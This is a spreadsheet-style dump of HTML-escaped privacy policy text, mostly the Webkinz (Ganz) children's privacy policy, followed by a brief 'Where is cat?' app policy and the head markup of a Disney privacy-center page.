    <t>What Information Do We Collect and How?&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;                           &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s8"&gt;&lt;strong&gt;(b) How Do We Use the Information Collected?&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;                           &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s9"&gt;&lt;strong&gt;(c) What About Cookies and Tracking of Users? &lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;         2.         &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s10"&gt;&lt;strong&gt;How and When Do We Share Information with Third Parties?&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;         3.         &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s11"&gt;&lt;strong&gt;What About Ads and Advertisers?&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;         4.         &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s12"&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">What Do We Do Regarding Children’s Privacy and Safety?&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;         5.         &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s13"&gt;&lt;strong&gt; What About Data Security? &lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;         6.         &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s14"&gt;&lt;strong&gt;How Do I Change My Information and Communications Preferences?&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;         7.         &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s15"&gt;&lt;strong&gt; What About Changes to the Privacy Policy?&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;         8.         &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s16"&gt;&lt;strong&gt;Notice for California Residents.&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;         9.         &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s17"&gt;&lt;strong&gt;Notice to Canadian Residents. </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;         10.       &lt;/strong&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s17"&gt;&lt;strong&gt;Notice to Nevada Residents.  &lt;/strong&gt;&lt;/a&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;When this Privacy Policy refers to “&lt;strong&gt;Ganz&lt;/strong&gt;” or “&lt;strong&gt;we&lt;/strong&gt;”, it means Ganz, an Ontario partnership, operating this Webkinz Service.   When this Privacy Policy refers to “&lt;strong&gt;you&lt;/strong&gt;”, it means a parent or legal guardian of a Webkinz Service user under the age of 18, or otherwise a Webkinz Service user age 18 or older.  </t>
  </si>
  <si>
    <t xml:space="preserve">To the extent we provide you notice on the Webkinz Service of different or additional privacy policies or practices (e.g., at the point of our collection), those additional terms shall govern such data collection and use.&lt;/p&gt;
&lt;p&gt; This Privacy Policy does not apply to our data collection activities outside of the Webkinz Service (unless otherwise stated below), and is limited to our practices and our Webkinz Service and not to third party services or the practices of third parties. Consult their privacy policies regarding their practices.  </t>
  </si>
  <si>
    <t xml:space="preserve">Please supervise your children’s use of the Webkinz Service and exploration of the Internet.   In addition, please review the Service’s &lt;a href="http://www.webkinz.com/us_en/user_agreement.html" target="_blank"&gt;&lt;strong&gt;User Agreement&lt;/strong&gt;&lt;/a&gt;, which governs your use of the Service, and includes among other things limits on our liability and your remedies.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;By registering to use, and/or by using, the Webkinz Service, you agree to our &lt;/strong&gt;&lt;a href="http://www.webkinz.com/us_en/user_agreement.html" target="_blank"&gt;&lt;strong&gt;User Agreement&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; (which grants us rights from you, limits our liability to you and limits your remedies) and consent to our collection, use and sharing of your information and data, and other activities, as described in this Privacy Policy. </t>
  </si>
  <si>
    <t>&lt;/strong&gt; If you do not accept the terms of this Privacy Policy or the terms that govern the Webkinz Service, please exit the Webkinz Service and do not submit information to us in any way.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. What Information Do We Collect and How Do We Use It?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;When you (or your child) interact with the Webkinz Service, we may collect and store some personal and non-personal information, including without limitation demographic and usage data, as permitted by applicable law and as described in this Privacy Policy.&lt;/p&gt;
 &lt;p&gt;When this Privacy Policy uses the term &lt;strong&gt;“Personal Information”&lt;/strong&gt;, it means information that identifies a particular individual.</t>
  </si>
  <si>
    <t>We do not condition user’s participation in any Webkinz Service activity on the user’s disclosure of more Personal Information than is reasonably required and is permitted by applicable law.&lt;br /&gt;
&lt;strong&gt;(a) What Information Do We Collect and How?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;At the time of account setup: (i) from users residing in Canada, Ganz collects their Webkinz pet’s type, name and gender, as well as the Webkinz Service user’s country of residence, user name and password; and (ii) from users residing outside of Canada, Ganz collects their Webkinz pet’s type, name and gender, the Webkinz Service user’s country of residence, first name, gender and date of birth (optional), user name and password, and parent’s email address (optional) which is collected for the sole purpose of notifying parents about their child’s activities on Webkinz Service&lt;/p&gt;
&lt;p&gt; We strongly advise children never to provide any Personal Information in their user name or pet’s name.</t>
  </si>
  <si>
    <t>If we discover that we have collected Personal Information from a user in a manner inconsistent with this Privacy Policy, COPPA or PIPEDA requirements, we will either delete the information to the extent required by applicable law or immediately seek any consent required by applicable law and this Privacy Policy for such collection. See &lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s18"&gt;Section 6&lt;/a&gt; (below) on how to contact us if you think we have done so, or to otherwise contact us about privacy matters.&lt;/p&gt;
&lt;p&gt; In addition to any Personal Information or other information that you choose to submit to us via Webkinz Service, we and our third-party service providers may use a variety of technologies that may automatically (or passively) store or collect certain information whenever you visit or interact with the Webkinz Service (“&lt;strong&gt;Usage Information&lt;/strong&gt;”).</t>
  </si>
  <si>
    <t>This Usage Information may be stored or accessed using a variety of technologies that may be downloaded to your personal computer, browser, laptop, tablet, mobile phone or other device (each a &lt;strong&gt;“Device”&lt;/strong&gt;) whenever you visit or interact with the Webkinz Service. To the extent we associate Usage Information with your Personal Information we collect directly from you on the Webkinz Service, we will treat such combined data as Personal Information, but we do not otherwise treat Usage Information that is not associated with a particular user’s personal information (including UIDs (defined below)) as Personal Information.&lt;br /&gt;
&lt;strong&gt;(b) How Do We Use the Information Collected?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Ganz stores and processes information collected through the Webkinz Service on servers located in Canada.</t>
  </si>
  <si>
    <t xml:space="preserve">We may use your Personal Information, and non-personal information (e.g., demographic information or Usage Information) that we collect about you: (1) to provide you with information or services or process transactions that you have requested or agreed to receive, including to send you electronic newsletters, or to provide you with our special offers or promotional materials; (2) to enable you to participate in a variety of the Webkinz Services’ features; (3) to process your account registration request; (4) to improve the Webkinz Services or create new service offerings, to customize your experience on any of the services, or to serve you specific content that is most relevant to you, e.g. country-specific advertising; (5) to contact you with regard to your use of the Webkinz Service and, in our discretion, changes to any of the services and/or any of the Webkinz Services’ policies; (6) for internal business purposes; and (7) for purposes disclosed at the time you provide your information or as otherwise set forth in this Privacy Policy or for any other legal purpose not inconsistent with this Privacy Policy. Such uses will be limited as may be required by applicable law (see for example &lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s19"&gt;Section 4&lt;/a&gt; (below) on children’s privacy). Without limiting the generality of the forgoing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We rely on the user name and password to validate Webkinz Service users at the time of login or when they contact Customer Service.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;We rely on the country of residence data to serve country-specific content, including advertising.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>&lt;ul&gt;
&lt;li&gt;If you opt in to receive offers, promotions or other information from Ganz (which is done through the Parent’s Account), we will use your contact information to provide you with such communications.&lt;/li&gt;
&lt;/ul&gt;
 &lt;ul&gt;
&lt;li&gt;If you consent to your child using the KinzChat PLUS chat feature of the Webkinz Service, your child may be able to chat with other Webkinz Service users, using a restricted dictionary. Please note that our chat areas are monitored and our chat system is filtered using a restricted word dictionary.&lt;/li&gt;
&lt;li&gt;In the chat rooms and when trading, users are identified to other users by the first three letters of their user name combined with their pet’s name, unless they are on each other’s “Friends’ List” in which case they are identified to their friends by their user name.</t>
  </si>
  <si>
    <t>Real name, or contact information, is not a permitted user or pet’s name.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;(c) What About Cookies and Tracking of Users?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Each user account gets assigned a unique user ID. Ganz relies on such user ID to track game statistics, log Webkinz Service user achievements and analyze basic game data.</t>
  </si>
  <si>
    <t>We may look for and collect other unique identifiers (“&lt;strong&gt;UID&lt;/strong&gt;”) associated with you such as your IP address and Device identifier. We do not consider UIDs on their own to be Personal Information as defined by this Privacy Policy, but to the extent applicable law treats them as personal information we comply with the requirements of such laws notwithstanding how they are defined under this Privacy Policy. In addition, Ganz may rely on other forms of UIDs such as cookies (small text files stored on the user’s hard drive, not the Webkinz Service, which may be HTML files, Flash files, or other technology), web beacons (images, also known as ‘clear gifs’), or other now and later known tracking technologies (collectively, “&lt;strong&gt;</t>
  </si>
  <si>
    <t>Tracking Technologies&lt;/strong&gt;”) to gather data. Without limiting the generality of the forgoing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ganz uses cookies for general site settings.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;We may track traffic patterns by using logs of database transactions and server interactions.&lt;/li&gt;
&lt;/ul&gt;
 &lt;ul&gt;
&lt;li&gt;Ganz and our approved third party advertising service providers may use Tracking Technologies for ad campaign analytics and frequency capping, or to segregate users from certain further online profiling, but not for OBA (defined below).&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;Ganz may rely on web beacons to count visitors.</t>
  </si>
  <si>
    <t>Web beacons only collect limited information, including a cookie number, a timestamp, and a record of the page on which they are placed. Furthermore, third party advertising service providers may place their own web beacons. These beacons do not carry any Personal Information and may only be used to track the effectiveness of a particular advertising campaign.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Regular cookies may generally be disabled or removed by tools that are available as part of most commercial browsers, and in some but not all instances can be blocked in the future by selecting certain settings.</t>
  </si>
  <si>
    <t>Each browser you use will need to be set separately and different browsers offer different functionality and options in this regard. Also, these tools may not be effective with regard to Flash cookies or HTML5 cookies or other Tracking Technologies. For information on disabling Flash cookies, go to Adobe’s website &lt;a href="http://helpx.adobe.com/flash-player/kb/disable-third-party-local-shared.html" target="_blank"&gt;http://helpx.adobe.com/flash-player/kb/disable-third-party-local-shared.html&lt;/a&gt;.</t>
  </si>
  <si>
    <t>Please be aware that if you disable or remove these technologies some parts of the Webkinz Services may not work and that when you revisit our services your ability to limit browser-based Tracking Technologies is subject to your browser settings and limitations. Further, app-related Tracking Technologies in connection with non-browser usage (e.g., most functionality of an app) can only be disabled by uninstalling the app. To uninstall an app, follow the instructions from your operating system or handset manufacturer.&lt;/p&gt;
&lt;p&gt;Third parties may use Tracking Technologies in connection with the Webkinz Service.</t>
  </si>
  <si>
    <t>However, we do not authorize third parties to do so for the purpose of the collection of information about your online activities over time and across third-party web sites or online services to build profiles about you and serve you with interest-based ads based on those profiles (so-called &lt;strong&gt;“online behavioral advertising”&lt;/strong&gt; or “&lt;strong&gt;OBA&lt;/strong&gt;”) and we require third parties that we authorize to associate Tracking Technologies with your Device by means of the Webkinz Service to comply with COPPA’s restrictions regarding such activities, including its restriction on OBA activities. Beyond these limitations we put on third parties, we do not control third party Tracking Technologies and we are not responsible for them to the fullest extent permitted by applicable law. However, you consent to potentially encountering third party Tracking Technologies in connection with the Webkinz Service.</t>
  </si>
  <si>
    <t>Some third parties may offer you certain choices regarding their practices. One way to determine this is to add the free Ghostery plug-in to your browser (&lt;a href="http://www.ghostery.com/" target="_blank"&gt;www.ghostery.com&lt;/a&gt;), which according to Ghostery will display for you cookies associated with the web sites (but not mobile apps) you visit and privacy and opt-out policies and options of the parties operating those cookies. We are not responsible for the completeness or accuracy of this tool.&lt;/p&gt;
&lt;p&gt;Also, various third parties are developing or have developed signals or other mechanisms known as “&lt;strong&gt;do not track signals&lt;/strong&gt;”.</t>
  </si>
  <si>
    <t>For instance, some browsers may have such signal options, though they differ as to if the signal is set as default or must be turned on by the user. Further, there is not yet an industry consensus as to what sites and app operators should do with regard to these signals. Accordingly, we do not monitor or take any action with respect to these signals or other mechanisms, though we may consider doing so if an understandable and practical standard is developed and widely adopted.</t>
  </si>
  <si>
    <t>However, as noted above, we do not permit OBA ads on the Webkinz Service.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s20"&gt;Return to Privacy Policy navigation links&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. How and When Do We Share Information with Third Parties?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; We may share non-Personal Information, such as aggregated user statistics, with third parties.</t>
  </si>
  <si>
    <t>We do not share your Personal Information that we have collected directly from you on the Webkinz Service with third parties, other than Ganz affiliates, for those third parties’ direct marketing purposes absent your consent, except as set forth in this Section 2 (e.g., as part of the sale of our business). We also comply with COPPA and PIPEDA regarding their respective data sharing restrictions. Without limiting the generality of the forgoing, we may disclose your information as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;At times, Ganz may use outside organizations to perform specialized services such as data analysis or e-mail delivery on our behalf.</t>
  </si>
  <si>
    <t>These service providers are only given the information needed to perform those services and they are bound contractually to protect the confidentiality, privacy and security of your information and to limit the use of your information to the service being provided. We may provide these vendors with access to user information, including UIDs and Personal Information, to carry out the services they are performing for us. However, we restrict the use of UIDs we share with our vendors to their and our internal operation purposes as required by COPPA or other applicable laws.</t>
  </si>
  <si>
    <t>Third-party analytics and other service providers may set and access their own Tracking Technologies on your Device and they may otherwise collect or have access to information about you. However, we require the vendors we authorize to do so to restrict the use of UIDs to their and our internal operation purposes as required by COPPA and other applicable laws. We are not otherwise responsible for those third party technologies or activities arising out of them.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;To the fullest extent permitted by applicable law, we may disclose data about you, including Personal Information to government, legal or regulatory authorities: (i) if so ordered by a court of law: or (ii) for other legal reasons, such as, (a) to comply with legal process such as a search warrant, subpoena or court order, (b) to protect the company’s rights and property, (c) to investigate reports of fraud or of users using a false email address or users sending harassing, threatening, or abusive messages, (d) to protect against what we believe in our sole and absolute discretion to be a misuse or unauthorized use of our Webkinz Service, or (e) in emergencies, such as when we believe our integrity requires protection or someone’s physical safety is at risk.</t>
  </si>
  <si>
    <t>In some cases, disclosure may be required by law to be without notice to you.&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt; In the case of any significant transaction or event contemplated by Ganz, for example, a sale, merger, amalgamation, financing, re-organization, liquidation, or insolvency, other parties to the contemplated transaction and their professional advisors may need to have access to Ganz’s customer lists and various databases as part of the due diligence process. In this event, Ganz would only provide access under terms of a strict confidentiality agreement.</t>
  </si>
  <si>
    <t>Also, upon completion of the transaction or event, your Personal Information and other data about you may be transferred to Ganz’s successor-in-interest to be used only for the purposes permitted under the applicable Privacy Policy pursuant to which it was collected by Ganz.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s20"&gt;Return to Privacy Policy navigation links&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. What About Ads and Advertisers?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;From time to time, Ganz may use third party advertising service providers to serve ads. Ganz is very selective of the third party advertising service providers it works with and only intends to authorize access to the Webkinz Service for ad serving to those that do not (i) use the Webkinz Service to associate cookies with Webkinz Service users or (ii) target OBA to our users while on the Webkinz Service.</t>
  </si>
  <si>
    <t>For more details see &lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s1"&gt;Section 1(c)&lt;/a&gt; above, and our &lt;a href="http://www.webkinz.com/ad-policy.html" target="_blank"&gt;Ad Policy&lt;/a&gt;. Furthermore, Ganz does not seek access to your online profile, if one has been built by third party advertising service providers, to serve you OBA ads while you are on the Webkinz Service. Similarly, the third party advertising service providers we engage to serve ads on the Webkinz Service do not have access to Tracking Technologies set by Ganz, or the Personal Information we collect from users on the Webkinz Service.</t>
  </si>
  <si>
    <t>Ganz makes good faith efforts to monitor its advertising service providers to ensure continued compliance with the above practices and is legally entitled to terminate its relationship with any provider should the third party advertising service provider change its approach to Personal Information and targeted advertising in a manner inconsistent with these restrictions.&lt;/p&gt;
&lt;p&gt; We do, however, serve non-OBA ads on the Webkinz Service and we and third parties may use Tracking Technologies for non-OBA purposes, such as to prevent repetition of ads, to track click throughs and other ad campaign effectiveness measurements. For more information on ads and advertisers regarding the Webkinz Service, see our &lt;a href="http://www.webkinz.com/ad-policy.html" target="_blank"&gt;Ad Policy&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We make efforts to keep ads on the Webkinz Service appropriate, in our opinion, to our audience. Further, we may offer certain parents options to limit ads, such as ad blocking for active Webkinz Service users.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s20"&gt;Return to Privacy Policy navigation links&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. What Do We Do Regarding Children’s Privacy and Safety?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;p&gt; We have made efforts to design the Webkinz Service to be what we think is child appropriate. For instance we limit the way people can contact your child.</t>
  </si>
  <si>
    <t>KinzChat is limited to pre-approved words from drop down boxes. If you consent to your child using the KinzChat PLUS chat feature of the Webkinz Service, your child may be able to chat with other Webkinz Service users, using a restricted dictionary. Such chat is monitored and we use filters designed to block submission of Personal Information and what we have identified as clearly age inappropriate language.</t>
  </si>
  <si>
    <t>However, no monitoring or filtering can be error free and what you deem inappropriate may differ. Please supervise your children’s use of the Webkinz Service and their exploration of the Internet and any social services, and teach them about protecting themselves and their Personal Information online.&lt;/p&gt;
&lt;p&gt; The Webkinz Service is intended to comply with COPPA and PIPEDA.</t>
  </si>
  <si>
    <t>If you reside in the United States, we encourage you to visit &lt;a href="http://www.ftc.gov/bcp/edu/pubs/consumer/tech/tec08.shtm" target="_blank"&gt;http://www.ftc.gov/bcp/edu/pubs/consumer/tech/tec08.shtm&lt;/a&gt; for more information about COPPA and children’s privacy. In the event that we become aware that we have collected COPPA-restricted personal information from any child other than as permitted under that law, we will dispose of that information, or otherwise treat it, in accordance with COPPA and other applicable laws and regulations. If you are a parent or guardian and you believe that your child under the age of thirteen (13) has provided us with personal information (as defined by COPPA) without COPPA-required consent, please write to: Privacy Officer, Ganz, One Pearce Road, Woodbridge, Ontario, L4L 3T2, Canada, or submit your inquiry via facsimile: 905-851-7427 or by email at &lt;a href="mailto:privacyofficer@ganz.com" target="_top"&gt;privacyofficer@ganz.com&lt;/a&gt;.Parents may want to consider commercially available parental control protections to limit what their children can access online and/or monitor their children’s online activities.</t>
  </si>
  <si>
    <t>Examples include: &lt;a href="http://www.netnanny.com/" target="_blank"&gt;www.netnanny.com&lt;/a&gt;; &lt;a href="http://www.webwatcher.com/" target="_blank"&gt;www.webwatcher.com&lt;/a&gt; and &lt;a href="http://www.sentrypc.com/" target="_blank"&gt;www.sentrypc.com&lt;/a&gt;. We do not endorse these or other services and are not responsible for them.&lt;/p&gt;
&lt;p&gt; There are many things you can do to protect your, and your child’s, privacy and safety, including exercising common sense.</t>
  </si>
  <si>
    <t>For instance, ensure that passwords used to access the Webkinz Service are both easy to remember, but hard to guess and not shared with anyone (other than your child sharing their passwords with you), and do not include Personal Information. We encourage users not to access their accounts from shared computers or devices or public computers or devices, to avoid the unauthorized accessing of their accounts. Furthermore, we recommend that users not store their logins/passwords on their computers or devices in case those fall into the hands of someone else.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s20"&gt;Return to Privacy Policy navigation links&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5.</t>
  </si>
  <si>
    <t>What About Data Security?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We endeavor to incorporate commercially reasonable safeguards to help protect and secure your Personal Information.&lt;/p&gt;
&lt;p&gt; In addition, our employees and our third party vendors that we give access to your Personal Information, will be contractually bound to protect the confidentiality of Personal Information. Such access to Personal Information is restricted to those with a need to know the information to carry out the approved activity.</t>
  </si>
  <si>
    <t>In any instance that we collect your Personal Information in connection with the Webkinz Service, we will retain it only so long as reasonably necessary to fulfill the defined purpose, for purposes of the security of our users and/or our Webkinz Service, and/or as required by law. With this is mind, accounts that have no paid pets or Deluxe Membership that remain inactive for 6 months will be deleted. Accounts with paid pets or that have had Deluxe Membership that remain inactive for 24 months will be deleted.</t>
  </si>
  <si>
    <t>In addition, you may request deletion of your child’s account at any time, via your Parent’s Account.&lt;/p&gt;
&lt;p&gt; However, no data transmission over the Internet, mobile networks, wireless transmission or electronic storage of information can be guaranteed to be 100% secure. Please note that we cannot ensure the security of any information you transmit to us, and you use the Webkinz Service, and provide us with your information, at your own risk.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://webkinznewz.ganzworld.com/share/privacy-policy/#s20"&gt;Return to Privacy Policy navigation links&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;6.</t>
  </si>
  <si>
    <t>How Do I Change My Information and Communications Preferences?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;You are responsible for maintaining the accuracy of the information you submit to us, such as your contact information provided as part of registration. The Webkinz Service may allow you to review, correct or update Personal Information, and you may provide registration updates and changes, using Parent Account tools that may be available from time-to-time, or by contacting us as set forth below. If so, we will make good faith efforts to make requested changes in our then active databases as soon as reasonably practicable.</t>
  </si>
  <si>
    <t>With respect to our mobile and other applications (i.e., when we are the application publisher), you can prospectively stop all collection of information by the application by uninstalling the app. You may use the standard uninstall process as may be available as part of your applicable Device or potentially via the appropriate app marketplace. Please note that it is not always possible to completely remove or delete all of your information from our databases and that residual data may remain on backup media or for other reasons.</t>
  </si>
  <si>
    <t>When you edit or request deletion of your Personal Information, information may persist internally for Company’s administrative purposes to the extent required or permitted by applicable law.&lt;/p&gt;
&lt;p&gt;Subject to the forgoing, you have the following choices regarding Personal Information collected by us in connection with the Webkinz Service:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you have any questions or comments about this Privacy Policy, or need to contact us with respect to a privacy concern or Personal Information we have on file about you and/or your child, or want to request deletion of the account, please write to: Privacy Officer, Ganz, One Pearce Road, Woodbridge, Ontario, L4L 3T2, Canada, or submit your inquiry via facsimile: 905-851-7427 or by email at &lt;a href="mailto:privacyofficer@ganz.com" target="_top"&gt;privacyofficer@ganz.com&lt;/a&gt;. (Children should have their parents submit questions or comments on their behalf.)  &lt;strong&gt;Personal information provided by email may not be secure, and you assume the risks associated with your email transmission or our reply.&lt;/strong&gt; Ganz may require that you identify yourself to our satisfaction.</t>
  </si>
  <si>
    <t>In the event that you are unable to identify yourself or your legal rights to obtain Personal Information we have about you and/ or your child, Ganz may, consistent with applicable law, decline to provide the information. In addition, you may request deletion of your chi</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta charset="UTF-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
&lt;link rel="stylesheet" type="text/css" href="bbnewstyle1801.css"&gt;
&lt;title&gt;privacy policy, Where is cat?&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div class="bio"&gt;
&lt;h1&gt;"Where is cat?", Privacy Policy&lt;/h1&gt;
&lt;br&gt;
&lt;p&gt;
 This page is used to inform you regarding my policies with the collection, use and disclosure of personal information for my app "Where is cat?". I respect the privacy of my users and I'm committed to protect the user's information, be it yours or your children's.</t>
  </si>
  <si>
    <t xml:space="preserve">I believe that you have a right to know my practices regarding the information I may collect and use when you use my app.
 &lt;br&gt;&lt;br&gt;
The "Where is cat?" app collects no personal data at all.&lt;br&gt;&lt;br&gt;
&lt;br&gt;&lt;br&gt;
If you have any questions about this Privacy Policy please contact me at bontegames@gmail.com
&lt;br&gt;&lt;br&gt;
Bart Bonte
&lt;br&gt;
&lt;a href="https://bartbonte.com"&gt;bartbonte.com&lt;/a&gt;
&lt;br&gt;
August 2019
&lt;br&gt;&lt;br&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>This may cause unintended consequences or missing data...")),this.features[t.featureName]=new t(this.agentIdentifier,this.sharedAggregator)}})),(0,P.Qy)(this.agentIdentifier,this.features,t)}catch(e){(0,v.Z)("Failed to initialize all enabled instrument classes (agent aborted) -",e);for(const e in this.features)this.features[e].abortHandler?.();const r=(0,P.fP)();return delete r.initializedAgents[this.agentIdentifier]?.api,delete r.initializedAgents[this.agentIdentifier]?.[t],delete this.sharedAggregator,r.ee?.abort(),delete r.ee?.get(this.agentIdentifier),!1}}}({features:[A,R,Z],loaderType:"lite"})})(),window.NRBA=o})();&lt;/script&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
    &lt;link rel="apple-touch-icon" sizes="180x180" href="https://privacy.thewaltdisneycompany.com/app/themes/privacycenter/assets/dist/images/favicons/apple-touch-icon.png"&gt;
    &lt;link rel="icon" type="image/png" sizes="32x32" href="https://privacy.thewaltdisneycompany.com/app/themes/privacycenter/assets/dist/images/favicons/favicon-32x32.png"&gt;
    &lt;link rel="icon" type="image/png" sizes="16x16" href="https://privacy.thewaltdisneycompany.com/app/themes/privacycenter/assets/dist/images/favicons/favicon-16x16.png"&gt;
    &lt;link rel="mask-icon" href="https://privacy.thewaltdisneycompany.com/app/themes/privacycenter/assets/dist/images/favicons/safari-pinned-tab.svg" color="#5bbad5"&gt;
    &lt;meta name="theme-color" content="#ffffff"&gt;
    &lt;script id="typekit"&gt;
        (function(d) {
            var config = {
                    kitId: 'ysb6omh',
                    scriptTimeout: 3000,
                    async: true
                },
                h=d.documentElement,t=setTimeout(function(){h.className=h.className.replace(/\bwf-loading\b/g,"")+" wf-inactive";},config.scriptTimeout),tk=d.createElement("script"),f=false,s=d.getElementsByTagName("script")[0],a;h.className+=" wf-loading";tk.src='https://use.typekit.net/'+config.kitId+'.js';tk.async=true;tk.onload=tk.onreadystatechange=function(){a=this.readyState;if(f||a&amp;&amp;a!="complete"&amp;&amp;a!="loaded")return;f=true;clearTimeout(t);try{Typekit.load(config)}catch(e){}};s.parentNode.insertBefore(tk,s)
        })(document);
    &lt;/script&gt;
    &lt;script async id="" src="https://cdn.registerdisney.go.com/v4/OneID.js"&gt;&lt;/script&gt;&lt;meta name="robots" content="index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/ar/" hreflang="ar"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/id/" hreflang="id"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/ms/" hreflang="ms"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/pt-br/" hreflang="pt-BR"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/bg/" hreflang="bg"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/fr-ca/" hreflang="fr-CA"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/zh/" hreflang="zh-CN"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/cs/" hreflang="cs"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/zh-hk/" hreflang="zh-HK"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/zh-tw/" hreflang="zh-TW"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/da/" hreflang="da"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/nl/" hreflang="nl"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/en/" hreflang="en"&gt;
